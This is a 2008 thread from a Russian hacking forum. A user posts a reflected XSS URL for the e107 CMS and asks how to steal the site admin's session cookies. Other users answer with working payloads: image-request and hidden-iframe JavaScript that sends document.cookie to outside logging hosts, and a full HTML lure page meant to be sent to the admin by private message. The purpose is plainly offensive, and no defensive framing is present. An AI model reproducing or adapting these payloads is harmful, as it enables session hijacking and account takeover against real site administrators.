ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Куки админа
  #1  
Старый 25.11.2008, 19:05
Аватар для WiSp
WiSp
Новичок
Регистрация: 25.06.2008
Сообщений: 5
Провел на форуме:
41608

Репутация: 0
По умолчанию Куки админа

Тако сабж...

Есть уязвимость в движке е107
Код:
clock_menu/clock_menu.php?clock_flat=1&LAN_407=foo%22);//--%3E%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Собсна проблема в том, что не знаю как сделать так чтобы, это все подсунуть админу, и чтобы его куки выскочили не в окне, а сохранились где-то на моем хосте в лог файлах...в этом роде...

З.Ы если есть другие варианты подскажите пожалуйста... а то уже 2-ую неделю мучаюсь

Заранее спасибо
 
Ответить с цитированием

  #2  
Старый 25.11.2008, 22:35
Аватар для WiSp
WiSp
Новичок
Регистрация: 25.06.2008
Сообщений: 5
Провел на форуме:
41608

Репутация: 0
По умолчанию

Эм....тут чуток разобрался...запустил снифер....Но снифер только на форум..на сайт никак...везде права на все урезаны...как мне через активную xSS можно сделать...Люди, помогите пожалуйста.
 
Ответить с цитированием

  #3  
Старый 26.11.2008, 12:09
Аватар для chekist
chekist
Reservists Of Antichat - Level 6
Регистрация: 14.11.2007
Сообщений: 177
Провел на форуме:
1246854

Репутация: 622
По умолчанию

сделай страничку на каком нибудь фрихосте, на странице сделай нивидимый фрейм на хсс, админу в личку отправь месачь с сылкой на эту страницу
 
Ответить с цитированием

  #4  
Старый 26.11.2008, 19:12
Аватар для WiSp
WiSp
Новичок
Регистрация: 25.06.2008
Сообщений: 5
Провел на форуме:
41608

Репутация: 0
По умолчанию

Собствеено делаю....

Вот
Цитата:
<script>img = new Image(); img.src = "http://na-s.ru/images/image_1.gif?"+document.cookie; // код кражи куки // редирект через 3 сек. var URL = "http://image.ru/image.jpg" // адрес картинки var speed = 3000 function reload() { document.location = URL } setTimeout("reload()", speed); </script>
Но не работает( как ни старался... проверял на своем хосте...
 
Ответить с цитированием

  #5  
Старый 26.11.2008, 20:21
Аватар для WiSp
WiSp
Новичок
Регистрация: 25.06.2008
Сообщений: 5
Провел на форуме:
41608

Репутация: 0
По умолчанию

А используя

Код:
document.write('<iframe width=1 height=1 style="position: absolute; visibility: hidden;" src="'+'http://xss.host.ru/xss.php'+'?['+location.host+']:'+document.cookie+'"></iframe>');
используя ява скрипт он должен открывать в принципе фрейм и сохранять куки вот здесь http://xss.host.ru/cookies

Но после всех проделанных действий ни куки ничего...

З.Ы. хост поддерживает и выполнение ява скриптов и пхп
 
Ответить с цитированием

  #6  
Старый 26.11.2008, 21:19
Аватар для furang
furang
Познающий
Регистрация: 07.04.2007
Сообщений: 88
Провел на форуме:
6406543

Репутация: 48
По умолчанию

у кукисов наверно ограниченная зона действия.
по дефолту у всех / стоит, но можно выбрать и другую диру
 
Ответить с цитированием

  #7  
Старый 27.11.2008, 13:02
Аватар для chekist
chekist
Reservists Of Antichat - Level 6
Регистрация: 14.11.2007
Сообщений: 177
Провел на форуме:
1246854

Репутация: 622
По умолчанию

попробуй так
Код HTML:
<html>
тут какой нибуть флуд для админа

<iframe width=21 height=11 style="position: absolute; visibility: hidden;" src="http://жертва/clock_menu/clock_menu.php?clock_flat=1&LAN_407=foo%22);//--><script>document.location='http://тутснифер/?'+document.cookie+;</script>"></iframe>
</html>
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Уязвимости в WR-Meeting 1.0 otmorozok428 Сценарии/CMF/СMS 8 21.05.2008 17:17
Аудит аутентификации на Web-сайтах. Часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:20
Проверка надежности Web-приложений. Часть Третья k00p3r Чужие Статьи 0 13.06.2005 11:17
Если уже имеется доступ в админ панель форума PhpBB, как узнать реал пасс админа? silveran Форумы 3 06.05.2005 18:54
Есть хеш админа форума phpBB.Можно ли заменитьть куки, чтобы получить права админа? proff Форумы 14 06.05.2005 06:00



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ